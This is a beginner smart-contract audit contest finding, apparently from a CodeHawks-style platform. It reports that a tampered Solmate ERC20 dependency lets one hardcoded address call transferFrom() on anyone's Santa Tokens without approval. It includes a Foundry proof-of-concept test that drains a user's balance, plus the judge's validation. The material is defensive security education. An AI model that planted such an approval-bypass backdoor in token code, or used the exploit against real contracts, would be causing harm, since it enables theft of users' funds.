First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Malicious implementation of `transferFrom()`

t0x1c

Summary

Address 0x815F577F1c1bcE213c012f166744937C889DAF17 has been given powers to steal anyone's Santa Tokens inside transferFrom().

Vulnerability Details

The following PoC shows the exploit:

function test_t0x1c_transfer() public {
// let's assume a user has some santa tokens
deal(address(santaToken), user, 100e18);
assertEq(santaToken.balanceOf(user), 100e18);
// attack
address attacker = address(0x815F577F1c1bcE213c012f166744937C889DAF17);
vm.startPrank(attacker);
santaToken.transferFrom(user, attacker, 100e18);
assertEq(santaToken.balanceOf(user), 0);
assertEq(santaToken.balanceOf(attacker), 100e18);
vm.stopPrank();
}

Impact

Nobody's funds(santa tokens) are safe as no approval step is required for this attack vector.

Tools Used

Foundry

Recommendations

Use the standard version of Solmate from https://github.com/transmissions11/solmate/blob/main/src/tokens/ERC20.sol

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.